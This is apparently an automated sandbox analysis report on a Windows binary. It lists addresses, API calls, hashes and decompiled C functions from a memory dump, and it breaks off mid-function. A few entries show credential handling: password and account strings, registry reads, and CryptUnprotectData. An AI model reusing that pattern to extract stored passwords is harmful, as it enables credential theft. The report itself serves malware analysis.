                                          0x0040593f
                                          0x0040594b
                                          0x0040594d
                                          0x00405953
                                          0x0040595d
                                          0x0040596f
                                          0x00405974
                                          0x0040597a
                                          0x0040597f
                                          0x0040598b
                                          0x00405994
                                          0x0040599d
                                          0x004059a3
                                          0x004059a6
                                          0x004059b0
                                          0x00405a29
                                          0x00405a2c
                                          0x00405a2f
                                          0x00405a36
                                          0x00405a37
                                          0x00405a3a
                                          0x004059b2
                                          0x004059b8
                                          0x004059ba
                                          0x004059e2
                                          0x004059e4
                                          0x004059e4
                                          0x004059e8
                                          0x004059ea
                                          0x004059ea
                                          0x004059ee
                                          0x004059f0
                                          0x004059f0
                                          0x004059f4
                                          0x004059f6
                                          0x004059f6
                                          0x004059fa
                                          0x004059fc
                                          0x004059fc
                                          0x00405a00
                                          0x00405a02
                                          0x00405a02
                                          0x00405a06
                                          0x00405a08
                                          0x00405a08
                                          0x00405a0c
                                          0x00405a0e
                                          0x00405a0e
                                          0x00405a10
                                          0x00405a17
                                          0x004059bc
                                          0x004059bc
                                          0x004059c4
                                          0x004059cb
                                          0x004059cf
                                          0x004059d6
                                          0x004059dc
                                          0x004059dc
                                          0x00405a19
                                          0x00405a1b
                                          0x00405a1c
                                          0x00405a1f
                                          0x00405a22
                                          0x00405a24
                                          0x00405a24
                                          0x00405a47
                                          0x00405a4c
                                          0x00405a4e
                                          0x00405a51
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405a51
                                          0x004059a6
                                          0x0040597f
                                          0x00405929
                                          0x0040591d
                                          0x00405a57
                                          0x00405a5c
                                          0x00405a6f
                                          0x00405a71
                                          0x00405a74
                                          0x00405a77
                                          0x00405a7e
                                          0x00405a7e
                                          0x00405a98
                                          0x00405a9d
                                          0x00405a9d
                                          0x00405aab
                                          0x00405ab2
                                          0x00405ab3
                                          0x00405ab8
                                          0x00405ab8
                                          0x00405abe
                                          0x00405ad1
                                          0x00405ad6
                                          0x00405ad6
                                          0x00405ae5

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$strlen
                                          • String ID: '$'$S'password'$S'username'
                                          • API String ID: 3337090206-859024053
                                          • Opcode ID: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
                                          • Instruction ID: 095c589e2a809376e97825867b0f887a5e853f6b8f709b3ead32f3d6acc6b9c2
                                          • Opcode Fuzzy Hash: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
                                          • Instruction Fuzzy Hash: A5716071D0065DAECF21DB94C881BEFBBB4EF1A314F5041ABD444B7282D6385A8A8F59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040AC28, Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E0040AC28(void* __eax) {
				void* _v36;
				long _v40;
				intOrPtr _v44;
				intOrPtr _v52;
				void* _v68;
				long _t21;
				void* _t24;
				long _t26;
				long _t34;
				long _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;

				_t40 =  *0x415030; // 0x73451ab0
				_t47 = __eax;
				_t44 =  *0x415040; // 0x73452040
				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
					_t37 =  *_t40(0x10, 0x10, 0x19, 1, 1);
					 *(__eax + 0x18c) = _t37;
					 *_t44(_t37, 1);
					SendMessageA( *(__eax + 0x184), 0x1003, 1,  *(__eax + 0x18c));
				}
				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
					 *(_t47 + 0x190) = _t34;
					 *_t44(_t34, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
				}
				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
				 *(_t47 + 0x188) = _t21;
				 *_t44(_t21, 2);
				_v36 = LoadImageA( *0x41dbd4, 0x85, 0, 0x10, 0x10, 0x1000);
				_t24 = LoadImageA( *0x41dbd4, 0x86, 0, 0x10, 0x10, 0x1000);
				_t42 = _t24;
				 *_t44( *(_t47 + 0x188), 0);
				_t26 = GetSysColor(0xf);
				_t45 =  *0x41503c; // 0x734523b0
				_v40 = _t26;
				 *_t45( *(_t47 + 0x188), _v44, _t26);
				 *_t45( *(_t47 + 0x188), _t42, _v52);
				DeleteObject(_v68);
				DeleteObject(_t42);
				return SendMessageA(E00405068( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
			}


















                                          0x0040ac2b
                                          0x0040ac39
                                          0x0040ac43
                                          0x0040ac49
                                          0x0040ac55
                                          0x0040ac5a
                                          0x0040ac60
                                          0x0040ac75
                                          0x0040ac75
                                          0x0040ac7e
                                          0x0040ac8a
                                          0x0040ac8f
                                          0x0040ac95
                                          0x0040acaa
                                          0x0040acaa
                                          0x0040acb6
                                          0x0040acbb
                                          0x0040acc1
                                          0x0040acf7
                                          0x0040acfb
                                          0x0040ad05
                                          0x0040ad07
                                          0x0040ad0b
                                          0x0040ad11
                                          0x0040ad1c
                                          0x0040ad26
                                          0x0040ad33
                                          0x0040ad3f
                                          0x0040ad42
                                          0x0040ad68

                                          APIs
                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040AC75
                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040ACAA
                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040ACDF
                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040ACFB
                                          • GetSysColor.USER32(0000000F), ref: 0040AD0B
                                          • DeleteObject.GDI32(?), ref: 0040AD3F
                                          • DeleteObject.GDI32(00000000), ref: 0040AD42
                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040AD60
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                          • String ID:
                                          • API String ID: 3642520215-0
                                          • Opcode ID: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
                                          • Instruction ID: 10adafa9a034a25fdfd439dfbbefb27d9cbe3ef8874ff0eb0b967345faf6b271
                                          • Opcode Fuzzy Hash: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
                                          • Instruction Fuzzy Hash: B8316171680708BFFA316B60DC47FD67695EB88B00F104829F3857A1E1CAF278909B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D1D6, Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 77COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi
                                          • String ID: account$name$password$protocol
                                          • API String ID: 1439213657-933060687
                                          • Opcode ID: 9f4445d43ae643b9a2fe9e2fdb03cf84892fe8e67e04b4e06ad1d96e1e33e757
                                          • Instruction ID: 794633c49b8c9c94e8125cdebcfe219ffcc263fe4270280c1a3d0952be7122e7
                                          • Opcode Fuzzy Hash: 9f4445d43ae643b9a2fe9e2fdb03cf84892fe8e67e04b4e06ad1d96e1e33e757
                                          • Instruction Fuzzy Hash: EA2130B2608702ADE718DE7598407D6F7D4BF05715F20022FE66CD2180FB39A554CB9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B3FF, Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040B3FF(void* __esi) {
				struct HDWP__* _v8;
				int _v12;
				intOrPtr _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _t32;
				int _t60;
				int _t65;

				if( *((intOrPtr*)(__esi + 0x140)) != 0) {
					GetClientRect( *(__esi + 0x108),  &_v32);
					GetWindowRect( *(__esi + 0x114),  &_v48);
					_t65 = _v48.bottom - _v48.top + 1;
					GetWindowRect( *(__esi + 0x118),  &_v48);
					_v12 = _v32.right - _v32.left;
					_t60 = _v48.bottom - _v48.top + 1;
					_v16 = _v32.bottom - _v32.top;
					_v8 = BeginDeferWindowPos(3);
					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x390)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t32;
			}











                                          0x0040b40c
                                          0x0040b41e
                                          0x0040b434
                                          0x0040b446
                                          0x0040b447
                                          0x0040b455
                                          0x0040b460
                                          0x0040b461
                                          0x0040b470
                                          0x0040b481
                                          0x0040b4a1
                                          0x0040b4c8
                                          0x00000000
                                          0x0040b4d8
                                          0x0040b4da

                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 0040B41E
                                          • GetWindowRect.USER32(?,?), ref: 0040B434
                                          • GetWindowRect.USER32(?,?), ref: 0040B447
                                          • BeginDeferWindowPos.USER32(00000003), ref: 0040B464
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B481
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B4A1
                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B4C8
                                          • EndDeferWindowPos.USER32(?), ref: 0040B4D1
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Window$Defer$Rect$BeginClient
                                          • String ID:
                                          • API String ID: 2126104762-0
                                          • Opcode ID: 0757be7f740c367b27a432adcadcbbd04f52c6bec85c836fbe865042ee467c30
                                          • Instruction ID: fdc4126930c1b8f3c9151252813053957ee6f88c11e53af12b0e4d030a96b888
                                          • Opcode Fuzzy Hash: 0757be7f740c367b27a432adcadcbbd04f52c6bec85c836fbe865042ee467c30
                                          • Instruction Fuzzy Hash: CA21D672900609FFDF12CFA8DD89FEEBBB9FB48310F108464FA55A2160C7316A519B24
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004072B5, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E004072B5(void* _a4) {
				void* _t7;
				signed int _t10;
				int _t12;
				void* _t16;
				signed int _t18;
				void* _t21;

				_t21 = _a4;
				_t18 = 0;
				EmptyClipboard();
				if(_t21 != 0) {
					_t2 = strlen(_t21) + 1; // 0x1
					_t12 = _t2;
					_t7 = GlobalAlloc(0x2000, _t12);
					_t16 = _t7;
					if(_t16 != 0) {
						GlobalFix(_t16);
						memcpy(_t7, _t21, _t12);
						GlobalUnWire(_t16);
						_t10 = SetClipboardData(1, _t16);
						asm("sbb esi, esi");
						_t18 =  ~( ~_t10);
					}
				}
				CloseClipboard();
				return _t18;
			}









                                          0x004072b6
                                          0x004072bb
                                          0x004072bd
                                          0x004072c5
                                          0x004072d0
                                          0x004072d0
                                          0x004072d9
                                          0x004072df
                                          0x004072e3
                                          0x004072e6
                                          0x004072ef
                                          0x004072f8
                                          0x00407301
                                          0x0040730b
                                          0x0040730d
                                          0x0040730d
                                          0x00407310
                                          0x00407311
                                          0x0040731b

                                          APIs
                                          • EmptyClipboard.USER32 ref: 004072BD
                                          • strlen.MSVCRT ref: 004072CA
                                          • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040BB80,?), ref: 004072D9
                                          • GlobalFix.KERNEL32(00000000), ref: 004072E6
                                          • memcpy.MSVCRT ref: 004072EF
                                          • GlobalUnWire.KERNEL32(00000000), ref: 004072F8
                                          • SetClipboardData.USER32(00000001,00000000), ref: 00407301
                                          • CloseClipboard.USER32 ref: 00407311
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
                                          • String ID:
                                          • API String ID: 2315226746-0
                                          • Opcode ID: a78d69c54143d1a16fd49fb3941744d5e455784aa02fabf2be394f33c89f07e1
                                          • Instruction ID: b56ddb85736e4a30ce9fec78ed7ee79c44370bf8c75140d3078b235505e53826
                                          • Opcode Fuzzy Hash: a78d69c54143d1a16fd49fb3941744d5e455784aa02fabf2be394f33c89f07e1
                                          • Instruction Fuzzy Hash: 7DF0B437A00619BBD3112BA1BC4CEDB7B2CDBC4B96B054179FE05D6152DA38980486F9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040A129, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 26%
                                          			E0040A129(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v48;
				char _v68;
				void _v96;
				signed int _t51;
				char* _t53;
				intOrPtr* _t61;
				intOrPtr* _t65;
				signed int _t66;
				intOrPtr _t80;
				intOrPtr* _t87;
				signed int _t91;
				void* _t92;
				void* _t93;

				_t65 = __ebx;
				_t66 = 6;
				memcpy( &_v96, 0x4183e4, _t66 << 2);
				_t93 = _t92 + 0xc;
				asm("movsw");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				E004067EC(_a4, "<tr>");
				_t91 = 0;
				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
					do {
						_t51 =  *( *((intOrPtr*)(_t65 + 0x24)) + _t91 * 4);
						_v8 = _t51;
						_t53 =  &_v96;
						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t65 + 0x34)) + 4)) == 0) {
							_t53 =  &_v48;
						}
						_t87 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t53;
						 *((intOrPtr*)( *_t65 + 0x30))(4, _t91, _t87,  &_v28);
						0x41241f(_v28,  &_v68);
						 *((intOrPtr*)( *_t87))(_v8,  *(_t65 + 0x4c));
						0x41244b();
						 *((intOrPtr*)( *_t65 + 0x48))( *((intOrPtr*)(_t65 + 0x50)), _t87, _v8);
						_t61 =  *((intOrPtr*)(_t65 + 0x50));
						_t80 =  *_t61;
						if(_t80 == 0 || _t80 == 0x20) {
							0x413cf4(_t61, "&nbsp;");
						}
						0x4124d4( *((intOrPtr*)(_t65 + 0x54)),  *((intOrPtr*)(_t65 + 0x50)));
						sprintf( *(_t65 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t65 + 0x54)));
						E004067EC(_a4,  *(_t65 + 0x4c));
						_t93 = _t93 + 0x20;
						_t91 = _t91 + 1;
					} while (_t91 <  *((intOrPtr*)(_t65 + 0x20)));
				}
				return E004067EC(_a4, 0x417de8);
			}






















                                          0x0040a129
                                          0x0040a133
                                          0x0040a13c
                                          0x0040a13c
                                          0x0040a13e
                                          0x0040a148
                                          0x0040a149
                                          0x0040a14a
                                          0x0040a14b
                                          0x0040a14c
                                          0x0040a156
                                          0x0040a157
                                          0x0040a15c
                                          0x0040a163
                                          0x0040a169
                                          0x0040a16c
                                          0x0040a172
                                          0x0040a17d
                                          0x0040a180
                                          0x0040a182
                                          0x0040a182
                                          0x0040a185
                                          0x0040a188
                                          0x0040a18c
                                          0x0040a190
                                          0x0040a194
                                          0x0040a19e
                                          0x0040a1a7
                                          0x0040a1b1
                                          0x0040a1c2
                                          0x0040a1c7
                                          0x0040a1d7
                                          0x0040a1da
                                          0x0040a1dd
                                          0x0040a1e1
                                          0x0040a1ee
                                          0x0040a1f4
                                          0x0040a1fe
                                          0x0040a210
                                          0x0040a21b
                                          0x0040a220
                                          0x0040a223
                                          0x0040a224
                                          0x0040a169
                                          0x0040a23f

                                          APIs
                                            • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                            • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                          • _mbscat.MSVCRT ref: 0040A1EE
                                          • sprintf.MSVCRT ref: 0040A210
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileWrite_mbscatsprintfstrlen
                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                          • API String ID: 1631269929-4153097237
                                          • Opcode ID: 3523185fe67812ce5c4df5690e324f3de58a353957d607fc5cd479dc7c7c253a
                                          • Instruction ID: f5ff55beaed6f71e33551b2c4209876a9ab5e20235427d51249a725151ce9b26
                                          • Opcode Fuzzy Hash: 3523185fe67812ce5c4df5690e324f3de58a353957d607fc5cd479dc7c7c253a
                                          • Instruction Fuzzy Hash: 68318231900209AFCF05DF54C8869DE7BB6FF44314F10416AFD11BB2A2DB76A955CB84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040876F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _mbscpy.MSVCRT ref: 004087EA
                                            • Part of subcall function 00408BF9: _itoa.MSVCRT ref: 00408C1A
                                          • strlen.MSVCRT ref: 00408808
                                          • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                          • memcpy.MSVCRT ref: 00408877
                                            • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408715
                                            • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408733
                                            • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408751
                                            • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408761
                                          Strings
                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408783
                                          • strings, xrefs: 004087E0
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                          • API String ID: 4036804644-4125592482
                                          • Opcode ID: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
                                          • Instruction ID: dfb39b5d66abeec2138625290c7fe1e8033edbc7f9ca8f6d480f1a826448875f
                                          • Opcode Fuzzy Hash: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
                                          • Instruction Fuzzy Hash: 60316E3E6001119FD714AF16EE809F63769FB84308794843EEC81A72A6DB39A841CB5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040FD2E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,73AFF420,00000000), ref: 0040FD62
                                          • RegCloseKey.ADVAPI32(?,?,73AFF420,00000000), ref: 0040FE4D
                                            • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                            • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          • memcpy.MSVCRT ref: 0040FDD4
                                          • LocalFree.KERNEL32(?,?,00000000,?,?,73AFF420,00000000), ref: 0040FDE6
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,73AFF420,00000000), ref: 0040FE2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpy
                                          • String ID:
                                          • API String ID: 2372935584-3916222277
                                          • Opcode ID: f66a63af9bc6ad28e2805ee69a38c801a35cdaa6f28638d5b3a381909aedb857
                                          • Instruction ID: 0b8e4f374d5667c45180376da1c8b12cffb8e3ff2062487e5a08cff45f7818d2
                                          • Opcode Fuzzy Hash: f66a63af9bc6ad28e2805ee69a38c801a35cdaa6f28638d5b3a381909aedb857
                                          • Instruction Fuzzy Hash: 6B414CB2900209ABCF21DF95D940ADEBBF8AF48304F10407BE915B7291D774AA44CFA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408D47, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 20%
                                          			E00408D47(struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
				int _v0;
				int _t25;
				char* _t31;
				intOrPtr _t32;
				int _t43;
				signed int _t45;
				signed int _t46;

				_t46 = _t45 & 0xfffffff8;
				0x414060();
				_t25 = GetMenuItemCount(_a8);
				_t43 = 0;
				_v0 = _t25;
				if(_t25 <= 0) {
					L13:
					return _t25;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a53, 0, 0x1000);
					_t46 = _t46 + 0xc;
					_a40 =  &_a52;
					_a4.cbSize = 0x30;
					_a8 = 0x36;
					_a44 = 0x1000;
					_a20 = 0;
					_a52 = 0;
					_t25 = GetMenuItemInfoA(_a8, _t43, 1,  &_a4);
					if(_t25 == 0) {
						goto L12;
					}
					if(_a52 == 0) {
						L10:
						if(_a24 != 0) {
							_push(0);
							_push(_a24);
							_push(_a4.cbSize);
							_t25 = E00408D47();
							_t46 = _t46 + 0xc;
						}
						goto L12;
					}
					_t31 = strchr( &_a52, 9);
					if(_t31 != 0) {
						 *_t31 = 0;
					}
					_t32 = _a20;
					if(_a24 != 0) {
						if(_a12 == 0) {
							 *0x41e1fc =  *0x41e1fc + 1;
							_t32 =  *0x41e1fc + 0x11558;
						} else {
							_t18 = _t43 + 0x11171; // 0x11171
							_t32 = _t18;
						}
					}
					_t25 = E00408D0F(_t32,  &_a52);
					goto L10;
					L12:
					_t43 = _t43 + 1;
				} while (_t43 < _v0);
				goto L13;
			}










                                          0x00408d4a
                                          0x00408d52
                                          0x00408d5c
                                          0x00408d64
                                          0x00408d68
                                          0x00408d6c
                                          0x00408e31
                                          0x00408e36
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00408d72
                                          0x00408d72
                                          0x00408d7d
                                          0x00408d82
                                          0x00408d89
                                          0x00408d98
                                          0x00408da0
                                          0x00408da8
                                          0x00408db0
                                          0x00408db4
                                          0x00408db8
                                          0x00408dc0
                                          0x00000000
                                          0x00000000
                                          0x00408dc6
                                          0x00408e10
                                          0x00408e14
                                          0x00408e16
                                          0x00408e17
                                          0x00408e1b
                                          0x00408e1e
                                          0x00408e23
                                          0x00408e23
                                          0x00000000
                                          0x00408e14
                                          0x00408dcf
                                          0x00408dd8
                                          0x00408dda
                                          0x00408dda
                                          0x00408de0
                                          0x00408de4
                                          0x00408de9
                                          0x00408df3
                                          0x00408dfe
                                          0x00408deb
                                          0x00408deb
                                          0x00408deb
                                          0x00408deb
                                          0x00408de9
                                          0x00408e09
                                          0x00000000
                                          0x00408e26
                                          0x00408e26
                                          0x00408e27
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                          • String ID: 0$6
                                          • API String ID: 2300387033-3849865405
                                          • Opcode ID: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
                                          • Instruction ID: e6c6313dcb9b7a471bbfbaa7ec765517bc0a4c64eff5ea5afbcc667e6a019d72
                                          • Opcode Fuzzy Hash: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
                                          • Instruction Fuzzy Hash: DD21BF71408384AFD7118F11D881A9BB7E8FF85348F044A3FF584A62D0EB39D944CB9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407034, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 59stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E00407034(char* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v1035;
				void _v1036;
				int _t28;
				int _t34;
				char* _t39;
				int _t42;
				void* _t43;
				void** _t45;
				void* _t46;
				void* _t47;

				_t42 = 0;
				_v1036 = 0;
				memset( &_v1035, 0, 0x3ff);
				_t47 = _t46 + 0xc;
				 *__ebx = 0;
				_t45 = _a4 + 4;
				_v12 = 8;
				do {
					_push( *_t45);
					_push( *((intOrPtr*)(_t45 - 4)));
					sprintf( &_v1036, "%s (%s)");
					_t28 = strlen( &_v1036);
					_v8 = _t28;
					memcpy(_t42 + __ebx,  &_v1036, _t28 + 1);
					_t43 = _t42 + _v8 + 1;
					_t34 = strlen( *_t45);
					_v8 = _t34;
					memcpy(_t43 + __ebx,  *_t45, _t34 + 1);
					_t47 = _t47 + 0x30;
					_t45 =  &(_t45[2]);
					_t17 =  &_v12;
					 *_t17 = _v12 - 1;
					_t42 = _t43 + _v8 + 1;
				} while ( *_t17 != 0);
				_t39 = _t42 + __ebx;
				 *_t39 = 0;
				 *((char*)(_t39 + 1)) = 0;
				return __ebx;
			}















                                          0x00407044
                                          0x0040704e
                                          0x00407055
                                          0x0040705d
                                          0x00407060
                                          0x00407063
                                          0x00407066
                                          0x0040706d
                                          0x0040706d
                                          0x00407075
                                          0x0040707e
                                          0x0040708a
                                          0x0040708f
                                          0x0040709f
                                          0x004070a9
                                          0x004070ad
                                          0x004070b2
                                          0x004070bd
                                          0x004070c5
                                          0x004070c8
                                          0x004070cb
                                          0x004070cb
                                          0x004070ce
                                          0x004070ce
                                          0x004070d4
                                          0x004070d8
                                          0x004070db
                                          0x004070e3

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memcpystrlen$memsetsprintf
                                          • String ID: %s (%s)
                                          • API String ID: 3756086014-1363028141
                                          • Opcode ID: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
                                          • Instruction ID: a198fb7af375a94c8e27cd288863d28c10177bb58caa4549e63a683f86c2f09a
                                          • Opcode Fuzzy Hash: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
                                          • Instruction Fuzzy Hash: 93114FB2800158BBDB21DF69DC45BDABBBCEF01309F0005AAE644B7101D775AB55CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406DCD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscat$memsetsprintf
                                          • String ID: %2.2X
                                          • API String ID: 125969286-791839006
                                          • Opcode ID: 2a8733490f50d4093b983ca8d1f50ec72e55e73e138ed9e783ee61cb0d8a9bf3
                                          • Instruction ID: 5142681b0c0ad1f2d34765b6081944bd4f79e84a169991ad97d052608da76018
                                          • Opcode Fuzzy Hash: 2a8733490f50d4093b983ca8d1f50ec72e55e73e138ed9e783ee61cb0d8a9bf3
                                          • Instruction Fuzzy Hash: 82012872A0431466D7225A26DC43BEB77AC9B44B05F10007FFC45B51C1FABC96C447D8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040496D, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$_mbscat
                                          • String ID: eK@$memcpy$msvcrt.dll
                                          • API String ID: 2404237207-527332992
                                          • Opcode ID: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
                                          • Instruction ID: ade7c94f42c2b1d8f6f4d02d55b8563967db19c46ba0ec0bd93feed85f1333d3
                                          • Opcode Fuzzy Hash: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
                                          • Instruction Fuzzy Hash: 7701001144DBC089E372D7289549B97AEE51B22608F48098DD1C647A83D2AAB65CC3BA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408B7A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E00408B7A(struct HWND__* _a4) {
				void _v4103;
				char _v4104;

				0x414060();
				if( *0x41e200 != 0) {
					_v4104 = 0;
					memset( &_v4103, 0, 0x1000);
					_push( *0x41e348);
					sprintf(0x41e308, "dialog_%d");
					if(E00408C31(?str?,  &_v4104) != 0) {
